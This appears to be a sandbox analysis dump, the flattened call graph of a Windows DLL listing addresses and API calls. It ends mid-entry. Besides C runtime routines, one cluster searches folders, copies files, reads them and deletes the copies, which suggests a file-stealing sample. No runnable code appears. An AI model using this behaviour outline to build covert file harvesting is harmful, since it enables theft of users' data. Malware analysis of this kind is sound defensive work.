7760->7762 7761->7731 7762->7761 7763 22c996a1 GetLastError 7762->7763 7764 22c9a181 WriteConsoleW CreateFileW 7762->7764 7763->7761 7764->7762 7766 22c99607 7765->7766 7770 22c994f5 7765->7770 7767 22c92ada _ValidateLocalCookies 5 API calls 7766->7767 7769 22c99641 7767->7769 7769->7731 7770->7766 7771 22c9957b WideCharToMultiByte 7770->7771 7772 22c979e6 40 API calls __fassign 7770->7772 7775 22c995d2 WriteFile 7770->7775 7834 22c97c19 7770->7834 7771->7766 7773 22c995a1 WriteFile 7771->7773 7772->7770 7773->7770 7774 22c9962a GetLastError 7773->7774 7774->7766 7775->7770 7775->7774 7781 22c99816 7776->7781 7777 22c998d8 7778 22c92ada _ValidateLocalCookies 5 API calls 7777->7778 7780 22c998f1 7778->7780 7779 22c99894 WriteFile 7779->7781 7782 22c998da GetLastError 7779->7782 7780->7731 7781->7777 7781->7779 7782->7777 7786 22c99904 7783->7786 7784 22c99a0f 7785 22c92ada _ValidateLocalCookies 5 API calls 7784->7785 7788 22c99a1e 7785->7788 7786->7784 7787 22c99986 WideCharToMultiByte 7786->7787 7789 22c999bb WriteFile 7786->7789 7787->7789 7790 22c99a07 GetLastError 7787->7790 7788->7731 7789->7786 7789->7790 7790->7784 7796 22c99737 7791->7796 7792 22c997ea 7793 22c92ada _ValidateLocalCookies 5 API calls 7792->7793 7795 22c99803 7793->7795 7794 22c997a9 WriteFile 7794->7796 7797 22c997ec GetLastError 7794->7797 7795->7731 7796->7792 7796->7794 7797->7792 7799 22c96355 __dosmaperr 20 API calls 7798->7799 7800 22c9633d __dosmaperr 7799->7800 7801 22c96368 __dosmaperr 20 API calls 7800->7801 7802 22c96350 7801->7802 7802->7734 7812 22c98d52 7803->7812 7805 22c99f9f 7806 22c99fb8 SetFilePointerEx 7805->7806 7807 22c99fa7 7805->7807 7808 22c99fd0 GetLastError 7806->7808 7811 22c99fac 7806->7811 7809 22c96368 __dosmaperr 20 API calls 7807->7809 7810 22c96332 __dosmaperr 20 API calls 7808->7810 7809->7811 7810->7811 7811->7707 7813 22c98d5f 7812->7813 7816 22c98d74 7812->7816 7814 22c96355 __dosmaperr 20 API calls 7813->7814 7815 22c98d64 7814->7815 7818 22c96368 __dosmaperr 20 API calls 7815->7818 7817 22c96355 __dosmaperr 20 API calls 7816->7817 7819 22c98d99 7816->7819 7820 22c98da4 7817->7820 7821 22c98d6c 7818->7821 7819->7805 7822 22c96368 __dosmaperr 20 API calls 7820->7822 7821->7805 7823 22c98dac 7822->7823 7824 22c962ac _abort 26 API calls 7823->7824 7824->7821 7826 22c98dc9 7825->7826 7827 22c98dd6 7825->7827 7828 22c96368 __dosmaperr 20 API calls 7826->7828 7829 22c98de2 7827->7829 7830 22c96368 __dosmaperr 20 API calls 7827->7830 7831 22c98dce 7828->7831 7829->7755 7832 22c98e03 7830->7832 7831->7755 7833 22c962ac _abort 26 API calls 7832->7833 7833->7831 7835 22c95af6 _abort 38 API calls 7834->7835 7836 22c97c24 7835->7836 7837 22c97a00 __fassign 38 API calls 7836->7837 7838 22c97c34 7837->7838 7838->7770 7839->7749 7843 22c9ad24 7840->7843 7842 22c9adca 7842->7664 7844 22c9ad30 ___scrt_is_nonwritable_in_current_image 7843->7844 7854 22c98c7b RtlEnterCriticalSection 7844->7854 7846 22c9ad3e 7847 22c9ad70 7846->7847 7848 22c9ad65 7846->7848 7850 22c96368 __dosmaperr 20 API calls 7847->7850 7855 22c9ae4d 7848->7855 7851 22c9ad6b 7850->7851 7870 22c9ad9a 7851->7870 7853 22c9ad8d _abort 7853->7842 7854->7846 7856 22c98d52 26 API calls 7855->7856 7859 22c9ae5d 7856->7859 7857 22c9ae63 7873 22c98cc1 7857->7873 7859->7857 7861 22c98d52 26 API calls 7859->7861 7869 22c9ae95 7859->7869 7863 22c9ae8c 7861->7863 7862 22c98d52 26 API calls 7864 22c9aea1 CloseHandle 7862->7864 7867 22c98d52 26 API calls 7863->7867 7864->7857 7868 22c9aead GetLastError 7864->7868 7865 22c96332 __dosmaperr 20 API calls 7866 22c9aedd 7865->7866 7866->7851 7867->7869 7868->7857 7869->7857 7869->7862 7882 22c98c9e RtlLeaveCriticalSection 7870->7882 7872 22c9ada4 7872->7853 7874 22c98cd0 7873->7874 7875 22c98d37 7873->7875 7874->7875 7881 22c98cfa 7874->7881 7876 22c96368 __dosmaperr 20 API calls 7875->7876 7877 22c98d3c 7876->7877 7878 22c96355 __dosmaperr 20 API calls 7877->7878 7879 22c98d27 7878->7879 7879->7865 7879->7866 7880 22c98d21 SetStdHandle 7880->7879 7881->7879 7881->7880 7882->7872 7883->7638 7884->7618 7288 22c9220c 7289 22c9221a dllmain_dispatch 7288->7289 7290 22c92215 7288->7290 7292 22c922b1 7290->7292 7293 22c922c7 7292->7293 7294 22c922d0 7293->7294 7296 22c92264 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter 7293->7296 7294->7289 7296->7294 7167 22c9284f 7170 22c92882 7167->7170 7173 22c93550 7170->7173 7172 22c9285d 7174 22c9358a 7173->7174 7175 22c9355d 7173->7175 7174->7172 7175->7174 7176 22c947e5 ___std_exception_copy 21 API calls 7175->7176 7177 22c9357a 7176->7177 7177->7174 7178 22c9544d ___std_exception_copy 26 API calls 7177->7178 7178->7174 7179 22c9724e GetProcessHeap 7035 22c97a80 7036 22c97a8d 7035->7036 7037 22c9637b _abort 20 API calls 7036->7037 7038 22c97aa7 7037->7038 7039 22c9571e _free 20 API calls 7038->7039 7040 22c97ab3 7039->7040 7041 22c9637b _abort 20 API calls 7040->7041 7045 22c97ad9 7040->7045 7042 22c97acd 7041->7042 7044 22c9571e _free 20 API calls 7042->7044 7044->7045 7046 22c97ae5 7045->7046 7047 22c95eb7 7045->7047 7048 22c95c45 _abort 5 API calls 7047->7048 7049 22c95ede 7048->7049 7050 22c95efc InitializeCriticalSectionAndSpinCount 7049->7050 7051 22c95ee7 7049->7051 7050->7051 7052 22c92ada _ValidateLocalCookies 5 API calls 7051->7052 7053 22c95f13 7052->7053 7053->7045 7180 22c98640 7183 22c98657 7180->7183 7184 22c98679 7183->7184 7185 22c98665 7183->7185 7187 22c98681 7184->7187 7188 22c98693 7184->7188 7186 22c96368 __dosmaperr 20 API calls 7185->7186 7189 22c9866a 7186->7189 7190 22c96368 __dosmaperr 20 API calls 7187->7190 7191 22c954a7 __fassign 38 API calls 7188->7191 7194 22c98652 7188->7194 7192 22c962ac _abort 26 API calls 7189->7192 7193 22c98686 7190->7193 7191->7194 7192->7194 7195 22c962ac _abort 26 API calls 7193->7195 7195->7194 7885 22c9af43 7886 22c9af59 7885->7886 7887 22c9af4d 7885->7887 7887->7886 7888 22c9af52 CloseHandle 7887->7888 7888->7886 7959 22c95303 7962 22c950a5 7959->7962 7971 22c9502f 7962->7971 7965 22c9502f 5 API calls 7966 22c950c3 7965->7966 7967 22c95000 20 API calls 7966->7967 7968 22c950ce 7967->7968 7969 22c95000 20 API calls 7968->7969 7970 22c950d9 7969->7970 7974 22c95048 7971->7974 7972 22c92ada _ValidateLocalCookies 5 API calls 7973 22c95069 7972->7973 7973->7965 7974->7972 7975 22c97103 GetCommandLineA GetCommandLineW 7889 22c9a945 7891 22c9a96d 7889->7891 7890 22c9a9a5 7891->7890 7892 22c9a99e 7891->7892 7893 22c9a997 7891->7893 7902 22c9aa00 7892->7902 7898 22c9aa17 7893->7898 7899 22c9aa20 7898->7899 7906 22c9b19b 7899->7906 7903 22c9aa20 7902->7903 7904 22c9b19b __startOneArgErrorHandling 21 API calls 7903->7904 7905 22c9a9a3 7904->7905 7907 22c9b1da __startOneArgErrorHandling 7906->7907 7912 22c9b25c __startOneArgErrorHandling 7907->7912 7916 22c9b59e 7907->7916 7909 22c9b286 7910 22c9b8b2 __startOneArgErrorHandling 20 API calls 7909->7910 7911 22c9b292 7909->7911 7910->7911 7914 22c92ada _ValidateLocalCookies 5 API calls 7911->7914 7912->7909 7913 22c978a3 __startOneArgErrorHandling 5 API calls 7912->7913 7913->7909 7915 22c9a99c 7914->7915 7917 22c9b5c1 __raise_exc RaiseException 7916->7917 7918 22c9b5bc 7917->7918 7918->7912 7338 22c97bc7 7339 22c97bd3 ___scrt_is_nonwritable_in_current_image 7338->7339 7340 22c97c0a _abort 7339->7340 7346 22c95671 RtlEnterCriticalSection 7339->7346 7342 22c97be7 7343 22c97f86 __fassign 20 API calls 7342->7343 7344 22c97bf7 7343->7344 7347 22c97c10 7344->7347 7346->7342 7350 22c956b9 RtlLeaveCriticalSection 7347->7350 7349 22c97c17 7349->7340 7350->7349 7351 22c9a1c6 IsProcessorFeaturePresent 7297 22c92418 7298 22c92420 ___scrt_release_startup_lock 7297->7298 7301 22c947f5 7298->7301 7300 22c92448 7302 22c94808 7301->7302 7303 22c94804 7301->7303 7306 22c94815 7302->7306 7303->7300 7307 22c95b7a __dosmaperr 20 API calls 7306->7307 7310 22c9482c 7307->7310 7308 22c92ada _ValidateLocalCookies 5 API calls 7309 22c94811 7308->7309 7309->7300 7310->7308 6110 22c91c5b 6111 22c91c6b ___scrt_fastfail 6110->6111 6114 22c912ee 6111->6114 6113 22c91c87 6115 22c91324 ___scrt_fastfail 6114->6115 6116 22c913b7 GetEnvironmentVariableW 6115->6116 6140 22c910f1 6116->6140 6119 22c910f1 57 API calls 6120 22c91465 6119->6120 6121 22c910f1 57 API calls 6120->6121 6122 22c91479 6121->6122 6123 22c910f1 57 API calls 6122->6123 6124 22c9148d 6123->6124 6125 22c910f1 57 API calls 6124->6125 6126 22c914a1 6125->6126 6127 22c910f1 57 API calls 6126->6127 6128 22c914b5 lstrlenW 6127->6128 6129 22c914d9 lstrlenW 6128->6129 6139 22c914d2 6128->6139 6130 22c910f1 57 API calls 6129->6130 6131 22c91501 lstrlenW lstrcatW 6130->6131 6132 22c910f1 57 API calls 6131->6132 6133 22c91539 lstrlenW lstrcatW 6132->6133 6134 22c910f1 57 API calls 6133->6134 6135 22c9156b lstrlenW lstrcatW 6134->6135 6136 22c910f1 57 API calls 6135->6136 6137 22c9159d lstrlenW lstrcatW 6136->6137 6138 22c910f1 57 API calls 6137->6138 6138->6139 6139->6113 6141 22c91118 ___scrt_fastfail 6140->6141 6142 22c91129 lstrlenW 6141->6142 6153 22c92c40 6142->6153 6145 22c91168 lstrlenW 6146 22c91177 lstrlenW FindFirstFileW 6145->6146 6147 22c911e1 6146->6147 6148 22c911a0 6146->6148 6147->6119 6149 22c911c7 FindNextFileW 6148->6149 6152 22c911aa 6148->6152 6149->6148 6151 22c911da FindClose 6149->6151 6151->6147 6152->6149 6155 22c91000 6152->6155 6154 22c91148 lstrcatW lstrlenW 6153->6154 6154->6145 6154->6146 6156 22c91022 ___scrt_fastfail 6155->6156 6157 22c910af 6156->6157 6158 22c9102f lstrcatW lstrlenW 6156->6158 6159 22c910b5 lstrlenW 6157->6159 6170 22c910ad 6157->6170 6160 22c9106b lstrlenW 6158->6160 6161 22c9105a lstrlenW 6158->6161 6186 22c91e16 6159->6186 6172 22c91e89 lstrlenW 6160->6172 6161->6160 6164 22c910ca 6166 22c91e89 5 API calls 6164->6166 6164->6170 6165 22c91088 GetFileAttributesW 6167 22c9109c 6165->6167 6165->6170 6169 22c910df 6166->6169 6167->6170 6178 22c9173a 6167->6178 6191 22c911ea 6169->6191 6170->6152 6173 22c92c40 ___scrt_fastfail 6172->6173 6174 22c91ea7 lstrcatW lstrlenW 6173->6174 6175 22c91ed1 lstrcatW 6174->6175 6176 22c91ec2 6174->6176 6175->6165 6176->6175 6177 22c91ec7 lstrlenW 6176->6177 6177->6175 6179 22c91747 ___scrt_fastfail 6178->6179 6206 22c91cca 6179->6206 6183 22c9199f 6183->6170 6184 22c91824 ___scrt_fastfail _strlen 6184->6183 6226 22c915da 6184->6226 6187 22c91e29 6186->6187 6190 22c91e4c 6186->6190 6188 22c91e2d lstrlenW 6187->6188 6187->6190 6189 22c91e3f lstrlenW 6188->6189 6188->6190 6189->6190 6190->6164 6192 22c9120e ___scrt_fastfail 6191->6192 6193 22c91e89 5 API calls 6192->6193 6194 22c91220 GetFileAttributesW 6193->6194 6195 22c91235 6194->6195 6196 22c91246 6194->6196 6195->6196 6198 22c9173a 35 API calls 6195->6198 6197 22c91e89 5 API calls 6196->6197 6199 22c91258 6197->6199 6198->6196 6200 22c910f1 56 API calls 6199->6200 6201 22c9126d 6200->6201 6202 22c91e89 5 API calls 6201->6202 6203 22c9127f ___scrt_fastfail 6202->6203 6204 22c910f1 56 API calls 6203->6204 6205 22c912e6 6204->6205 6205->6170 6207 22c91cf1 ___scrt_fastfail 6206->6207 6208 22c91d0f CopyFileW CreateFileW 6207->6208 6209 22c91d55 GetFileSize 6208->6209 6210 22c91d44 DeleteFileW 6208->6210 6211 22c91ede 22 API calls 6209->6211 6215 22c91808 6210->6215 6212 22c91d66 ReadFile 6211->6212 6213 22c91d7d CloseHandle DeleteFileW 6212->6213 6214 22c91d94 CloseHandle DeleteFileW 6212->6214 6213->6215 6214->6215 6215->6183 6216 22c91ede 6215->6216 6218 22c9222f 6216->6218 6219 22c9224e 6218->6219 6222 22c92250 6218->6222 6234 22c9474f 6218->6234 6239 22c947e5 6218->6239 6219->6184 6221 22c92908 6223 22c935d2 __CxxThrowException@8 RaiseException 6221->6223 6222->6221 6246 22c935d2 6222->6246 6225 22c92925 6223->6225 6225->6184 6227 22c9160c _strcat _strlen 6226->6227 6228 22c9163c lstrlenW 6227->6228 6334 22c91c9d 6228->6334 6230 22c91655 lstrcatW lstrlenW 6231 22c91678 6230->6231 6232 22c9167e lstrcatW 6231->6232 6233 22c91693 ___scrt_fastfail 6231->6233 6232->6233 6233->6184 6249 22c94793 6234->6249 6237 22c9478f 6237->6218 6238 22c94765 6255 22c92ada 6238->6255 6244 22c956d0 _abort 6239->6244 6240 22c9570e 6268 22c96368 6240->6268 6242 22c956f9 RtlAllocateHeap 6243 22c9570c 6242->6243 6242->6244 6243->6218 6244->6240 6244->6242 6245 22c9474f _abort 7 API calls 6244->6245 6245->6244 6247 22c935f2 RaiseException 6246->6247 6247->6221 6250 22c9479f ___scrt_is_nonwritable_in_current_image 6249->6250 6262 22c95671 RtlEnterCriticalSection 6250->6262 6252 22c947aa 6263 22c947dc 6252->6263 6254 22c947d1 _abort 6254->6238 6256 22c92ae3 6255->6256 6257 22c92ae5 IsProcessorFeaturePresent 6255->6257 6256->6237 6259 22c92b58 6257->6259 6267 22c92b1c SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 6259->6267 6261 22c92c3b 6261->6237 6262->6252 6266 22c956b9 RtlLeaveCriticalSection 6263->6266 6265 22c947e3 6265->6254 6266->6265 6267->6261 6271 22c95b7a GetLastError 6268->6271 6272 22c95b99 6271->6272 6273 22c95b93 6271->6273 6278 22c95bf0 SetLastError 6272->6278 6297 22c9637b 6272->6297 6290 22c95e08 6273->6290 6277 22c95bb3 6304 22c9571e 6277->6304 6279 22c95bf9 6278->6279 6279->6243 6283 22c95bb9 6285 22c95be7 SetLastError 6283->6285 6284 22c95bcf 6317 22c9593c 6284->6317 6285->6279 6288 22c9571e _free 17 API calls 6289 22c95be0 6288->6289 6289->6278 6289->6285 6322 22c95c45 6290->6322 6292 22c95e2f 6293 22c95e47 TlsGetValue 6292->6293 6296 22c95e3b 6292->6296 6293->6296 6294 22c92ada _ValidateLocalCookies 5 API calls 6295 22c95e58 6294->6295 6295->6272 6296->6294 6302 22c96388 _abort 6297->6302 6298 22c963c8 6301 22c96368 __dosmaperr 19 API calls 6298->6301 6299 22c963b3 RtlAllocateHeap 6300 22c95bab 6299->6300 6299->6302 6300->6277 6310 22c95e5e 6300->6310 6301->6300 6302->6298 6302->6299 6303 22c9474f _abort 7 API calls 6302->6303 6303->6302 6305 22c95729 HeapFree 6304->6305 6306 22c95752 __dosmaperr 6304->6306 6305->6306 6307 22c9573e 6305->6307 6306->6283 6308 22c96368 __dosmaperr 18 API calls 6307->6308 6309 22c95744 GetLastError 6308->6309 6309->6306 6311 22c95c45 _abort 5 API calls 6310->6311 6312 22c95e85 6311->6312 6313 22c95ea0 TlsSetValue 6312->6313 6314 22c95e94 6312->6314 6313->6314 6315 22c92ada _ValidateLocalCookies 5 API calls 6314->6315 6316 22c95bc8 6315->6316 6316->6277 6316->6284 6328 22c95914 6317->6328 6325 22c95c71 6322->6325 6327 22c95c75 __crt_fast_encode_pointer 6322->6327 6323 22c95c95 6326 22c95ca1 GetProcAddress 6323->6326 6323->6327 6324 22c95ce1 _abort LoadLibraryExW GetLastError LoadLibraryExW FreeLibrary 6324->6325 6325->6323 6325->6324 6325->6327 6326->6327 6327->6292 6329 22c95854 _abort RtlEnterCriticalSection RtlLeaveCriticalSection 6328->6329 6330 22c95938 6329->6330 6331 22c958c4 6330->6331 6332 22c95758 _abort 20 API calls 6331->6332 6333 22c958e8 6332->6333 6333->6288 6335 22c91ca6 _strlen 6334->6335 6335->6230 6372 22c920db 6375 22c920e7 ___scrt_is_nonwritable_in_current_image 6372->6375 6373 22c920f6 6374 22c92110 dllmain_raw 6374->6373 6376 22c9212a 6374->6376 6375->6373 6375->6374 6378 22c9210b 6375->6378 6385 22c91eec 6376->6385 6378->6373 6379 22c92177 6378->6379 6382 22c91eec 31 API calls 6378->6382 6379->6373 6380 22c91eec 31 API calls 6379->6380 6381 22c9218a 6380->6381 6381->6373 6383 22c92193 dllmain_raw 6381->6383 6384 22c9216d dllmain_raw 6382->6384 6383->6373 6384->6379 6386 22c91f2a dllmain_crt_process_detach 6385->6386 6387 22c91ef7 6385->6387 6394 22c91f06 6386->6394 6388 22c91f1c dllmain_crt_process_attach 6387->6388 6389 22c91efc 6387->6389 6388->6394 6390 22c91f01 6389->6390 6391 22c91f12 6389->6391 6390->6394 6395 22c9240b 6390->6395 6400 22c923ec 6391->6400 6394->6378 6408 22c953e5 6395->6408 6547 22c93513 6400->6547 6403 22c923f5 6403->6394 6406 22c92408 6406->6394 6407 22c9351e 7 API calls 6407->6403 6414 22c95aca 6408->6414 6411 22c9351e 6518 22c93820 6411->6518 6413 22c92415 6413->6394 6415 22c95ad4 6414->6415 6418 22c92410 6414->6418 6416 22c95e08 _abort 11 API calls 6415->6416 6417 22c95adb 6416->6417 6417->6418 6419 22c95e5e _abort 11 API calls 6417->6419 6418->6411 6420 22c95aee 6419->6420 6422 22c959b5 6420->6422 6423 22c959c0 6422->6423 6424 22c959d0 6422->6424 6428 22c959d6 6423->6428 6424->6418 6427 22c9571e _free 20 API calls 6427->6424 6429 22c959e9 6428->6429 6430 22c959ef 6428->6430 6432 22c9571e _free 20 API calls 6429->6432 6431 22c9571e _free 20 API calls 6430->6431 6433 22c959fb 6431->6433 6432->6430 6434 22c9571e _free 20 API calls 6433->6434 6435 22c95a06 6434->6435 6436 22c9571e _free 20 API calls 6435->6436 6437 22c95a11 6436->6437 6438 22c9571e _free 20 API calls 6437->6438 6439 22c95a1c 6438->6439 6440 22c9571e _free 20 API calls 6439->6440 6441 22c95a27 6440->6441 6442 22c9571e _free 20 API calls 6441->6442 6443 22c95a32 6442->6443 6444 22c9571e _free 20 API calls 6443->6444 6445 22c95a3d 6444->6445 6446 22c9571e _free 20 API calls 6445->6446 6447 22c95a48 6446->6447 6448 22c9571e _free 20 API calls 6447->6448 6449 22c95a56 6448->6449 6454 22c9589c 6449->6454 6460 22c957a8 6454->6460 6456 22c958c0 6457 22c958ec 6456->6457 6473 22c95809 6457->6473 6459 22c95910 6459->6427 6461 22c957b4 ___scrt_is_nonwritable_in_current_image 6460->6461 6468 22c95671 RtlEnterCriticalSection 6461->6468 6463 22c957e8 6469 22c957fd 6463->6469 6464 22c957be 6464->6463 6467 22c9571e _free 20 API calls 6464->6467 6466 22c957f5 _abort 6466->6456 6467->6463 6468->6464 6472 22c956b9 RtlLeaveCriticalSection 6469->6472 6471 22c95807 6471->6466 6472->6471 6474 22c95815 ___scrt_is_nonwritable_in_current_image 6473->6474 6481 22c95671 RtlEnterCriticalSection 6474->6481 6476 22c9581f 6482 22c95a7f 6476->6482 6478 22c95832 6486 22c95848 6478->6486 6480 22c95840 _abort 6480->6459 6481->6476 6483 22c95ab5 __fassign 6482->6483 6484 22c95a8e __fassign 6482->6484 6483->6478 6484->6483 6489 22c97cc2 6484->6489 6517 22c956b9 RtlLeaveCriticalSection 6486->6517 6488 22c95852 6488->6480 6490 22c97d42 6489->6490 6493 22c97cd8 6489->6493 6492 22c9571e _free 20 API calls 6490->6492 6516 22c97d90 6490->6516 6491 22c97e35 __fassign 20 API calls 6496 22c97d9e 6491->6496 6494 22c97d64 6492->6494 6493->6490 6497 22c9571e _free 20 API calls 6493->6497 6498 22c97d0b 6493->6498 6495 22c9571e _free 20 API calls 6494->6495 6499 22c97d77 6495->6499 6501 22c97dfe 6496->6501 6514 22c9571e 20 API calls _free 6496->6514 6502 22c97d00 6497->6502 6503 22c9571e _free 20 API calls 6498->6503 6515 22c97d2d 6498->6515 6504 22c9571e _free 20 API calls 6499->6504 6500 22c9571e _free 20 API calls 6505 22c97d37 6500->6505 6507 22c9571e _free 20 API calls 6501->6507 6508 22c990ba ___free_lconv_mon 20 API calls 6502->6508 6509 22c97d22 6503->6509 6510 22c97d85 6504->6510 6506 22c9571e _free 20 API calls 6505->6506 6506->6490 6511 22c97e04 6507->6511 6508->6498 6512 22c991b8 __fassign 20 API calls 6509->6512 6513 22c9571e _free 20 API calls 6510->6513 6511->6483 6512->6515 6513->6516 6514->6496 6515->6500 6516->6491 6517->6488 6519 22c9382d 6518->6519 6520 22c9384b ___vcrt_freefls@4 6518->6520 6521 22c9383b 6519->6521 6524 22c93b67 6519->6524 6520->6413 6529 22c93ba2 6521->6529 6534 22c93a82 6524->6534 6526 22c93b81 6527 22c93b99 TlsGetValue 6526->6527 6528 22c93b8d 6526->6528 6527->6528 6528->6521 6530 22c93a82 try_get_function 5 API calls 6529->6530 6531 22c93bbc 6530->6531 6532 22c93bd7 TlsSetValue 6531->6532 6533 22c93bcb 6531->6533 6532->6533 6533->6520 6535 22c93aaa 6534->6535 6539 22c93aa6 __crt_fast_encode_pointer 6534->6539 6535->6539 6540 22c939be 6535->6540 6538 22c93ac4 GetProcAddress 6538->6539 6539->6526 6541 22c939cd try_get_first_available_module 6540->6541 6542 22c93a77 6541->6542 6543 22c939ea LoadLibraryExW 6541->6543 6545 22c93a60 FreeLibrary 6541->6545 6546 22c93a38 LoadLibraryExW 6541->6546 6542->6538 6542->6539 6543->6541 6544 22c93a05 GetLastError 6543->6544 6544->6541 6545->6541 6546->6541 6553 22c93856 6547->6553 6549 22c923f1 6549->6403 6550 22c953da 6549->6550 6551 22c95b7a __dosmaperr 20 API calls 6550->6551 6552 22c923fd 6551->6552 6552->6406 6552->6407 6554 22c9385f 6553->6554 6555 22c93862 GetLastError 6553->6555 6554->6549 6556 22c93b67 ___vcrt_FlsGetValue 6 API calls 6555->6556 6557 22c93877 6556->6557 6558 22c938dc SetLastError 6557->6558 6559 22c93ba2 ___vcrt_FlsSetValue 6 API calls 6557->6559 6564 22c93896 6557->6564 6558->6549 6560 22c93890 6559->6560 6561 22c938b8 6560->6561 6562 22c93ba2 ___vcrt_FlsSetValue 6 API calls 6560->6562 6560->6564 6563 22c93ba2 ___vcrt_FlsSetValue 6 API calls 6561->6563 6561->6564 6562->6561 6563->6564 6564->6558 7054 22c94a9a 7057 22c95411 7054->7057 7058 22c9541d _abort 7057->7058 7059 22c95af6 _abort 38 API calls 7058->7059 7062 22c95422 7059->7062 7060 22c955a8 _abort 38 API calls 7061 22c9544c 7060->7061 7062->7060 7352 22c94bdd 7353 22c94c08 7352->7353 7354 22c94bec 7352->7354 7356 22c96d60 51 API calls 7353->7356 7354->7353 7355 22c94bf2 7354->7355 7357 22c96368 __dosmaperr 20 API calls 7355->7357 7358 22c94c0f GetModuleFileNameA 7356->7358 7359 22c94bf7 7357->7359 7360 22c94c33 7358->7360 7361 22c962ac _abort 26 API calls 7359->7361 7375 22c94d01 7360->7375 7363 22c94c01 7361->7363 7367 22c94c72 7370 22c94d01 38 API calls 7367->7370 7368 22c94c66 7369 22c96368 __dosmaperr 20 API calls 7368->7369 7374 22c94c6b 7369->7374 7371 22c94c88 7370->7371 7373 22c9571e _free 20 API calls 7371->7373 7371->7374 7372 22c9571e _free 20 API calls 7372->7363 7373->7374 7374->7372 7377 22c94d26 7375->7377 7379 22c94d86 7377->7379 7387 22c970eb 7377->7387 7378 22c94c50 7381 22c94e76 7378->7381 7379->7378 7380 22c970eb 38 API calls 7379->7380 7380->7379 7382 22c94c5d 7381->7382 7383 22c94e8b 7381->7383 7382->7367 7382->7368 7383->7382 7384 22c9637b _abort 20 API calls 7383->7384 7385 22c94eb9 7384->7385 7386 22c9571e _free 20 API calls 7385->7386 7386->7382 7390 22c97092 7387->7390 7391 22c954a7 __fassign 38 API calls 7390->7391 7392 22c970a6 7391->7392 7392->7377 7311 22c9281c 7312 22c92882 std::exception::exception 27 API calls 7311->7312 7313 22c9282a 7312->7313 7919 22c95351 7920 22c95374 7919->7920 7921 22c95360 7919->7921 7922 22c9571e _free 20 API calls 7920->7922 7921->7920 7924 22c9571e _free 20 API calls 7921->7924 7923 22c95386 7922->7923 7925 22c9571e _free 20 API calls 7923->7925 7924->7920 7926 22c95399 7925->7926 7927 22c9571e _free 20 API calls 7926->7927 7928 22c953aa 7927->7928 7929 22c9571e _free 20 API calls 7928->7929 7930 22c953bb 7929->7930 6565 22c936d0 6566 22c936e2 6565->6566 6568 22c936f0 @_EH4_CallFilterFunc@8 6565->6568 6567 22c92ada _ValidateLocalCookies 5 API calls 6566->6567 6567->6568 7063 22c93c90 RtlUnwind 7393 22c973d5 7394 22c973e1 ___scrt_is_nonwritable_in_current_image 7393->7394 7405 22c95671 RtlEnterCriticalSection 7394->7405 7396 22c973e8 7397 22c98be3 27 API calls 7396->7397 7398 22c973f7 7397->7398 7399 22c97406 7398->7399 7406 22c97269 GetStartupInfoW 7398->7406 7417 22c97422 7399->7417 7403 22c97417 _abort 7405->7396 7407 22c97286 7406->7407 7409 22c97318 7406->7409 7408 22c98be3 27 API calls 7407->7408 7407->7409 7410 22c972af 7408->7410 7412 22c9731f 7409->7412 7410->7409 7411 22c972dd GetFileType 7410->7411 7411->7410 7413 22c97326 7412->7413 7414 22c97369 GetStdHandle 7413->7414 7415 22c973d1 7413->7415 7416 22c9737c GetFileType 7413->7416 7414->7413 7415->7399 7416->7413 7420 22c956b9 RtlLeaveCriticalSection 7417->7420 7419 22c97429 7419->7403 7420->7419 6569 22c94ed7 6580 22c96d60 6569->6580 6575 22c9571e _free 20 API calls 6576 22c94f29 6575->6576 6577 22c94eff 6578 22c9571e _free 20 API calls 6577->6578 6579 22c94ef4 6578->6579 6579->6575 6581 22c96d69 6580->6581 6582 22c94ee9 6580->6582 6613 22c96c5f 6581->6613 6584 22c97153 GetEnvironmentStringsW 6582->6584 6585 22c9716a 6584->6585 6595 22c971bd 6584->6595 6586 22c97170 WideCharToMultiByte 6585->6586 6589 22c9718c 6586->6589 6586->6595 6587 22c94eee 6587->6579 6596 22c94f2f 6587->6596 6588 22c971c6 FreeEnvironmentStringsW 6588->6587 6590 22c956d0 21 API calls 6589->6590 6591 22c97192 6590->6591 6592 22c97199 WideCharToMultiByte 6591->6592 6593 22c971af 6591->6593 6592->6593 6594 22c9571e _free 20 API calls 6593->6594 6594->6595 6595->6587 6595->6588 6597 22c94f44 6596->6597 6598 22c9637b _abort 20 API calls 6597->6598 6600 22c94f6b 6598->6600 6599 22c9571e _free 20 API calls 6602 22c94fe9 6599->6602 6601 22c94fcf 6600->6601 6603 22c9637b _abort 20 API calls 6600->6603 6604 22c94fd1 6600->6604 6609 22c94ff3 6600->6609 6611 22c9571e _free 20 API calls 6600->6611 7013 22c9544d 6600->7013 6601->6599 6602->6577 6603->6600 7022 22c95000 6604->7022 6608 22c9571e _free 20 API calls 6608->6601 6610 22c962bc _abort 11 API calls 6609->6610 6612 22c94fff 6610->6612 6611->6600 6633 22c95af6 GetLastError 6613->6633 6615 22c96c6c 6653 22c96d7e 6615->6653 6617 22c96c74 6662 22c969f3 6617->6662 6620 22c96c8b 6620->6582 6623 22c96cce 6625 22c9571e _free 20 API calls 6623->6625 6625->6620 6627 22c96cc9 6628 22c96368 __dosmaperr 20 API calls 6627->6628 6628->6623 6629 22c96d12 6629->6623 6686 22c968c9 6629->6686 6630 22c96ce6 6630->6629 6631 22c9571e _free 20 API calls 6630->6631 6631->6629 6634 22c95b0c 6633->6634 6637 22c95b12 6633->6637 6635 22c95e08 _abort 11 API calls 6634->6635 6635->6637 6636 22c9637b _abort 20 API calls 6638 22c95b24 6636->6638 6637->6636 6639 22c95b61 SetLastError 6637->6639 6640 22c95b2c 6638->6640 6641 22c95e5e _abort 11 API calls 6638->6641 6639->6615 6642 22c9571e _free 20 API calls 6640->6642 6643 22c95b41 6641->6643 6644 22c95b32 6642->6644 6643->6640 6645 22c95b48 6643->6645 6646 22c95b6d SetLastError 6644->6646 6647 22c9593c _abort 20 API calls 6645->6647 6689 22c955a8 6646->6689 6648 22c95b53 6647->6648 6650 22c9571e _free 20 API calls 6648->6650 6652 22c95b5a 6650->6652 6652->6639 6652->6646 6654 22c96d8a ___scrt_is_nonwritable_in_current_image 6653->6654 6655 22c95af6 _abort 38 API calls 6654->6655 6660 22c96d94 6655->6660 6657 22c96e18 _abort 6657->6617 6659 22c955a8 _abort 38 API calls 6659->6660 6660->6657 6660->6659 6661 22c9571e _free 20 API calls 6660->6661 6862 22c95671 RtlEnterCriticalSection 6660->6862 6863 22c96e0f 6660->6863 6661->6660 6867 22c954a7 6662->6867 6665 22c96a14 GetOEMCP 6668 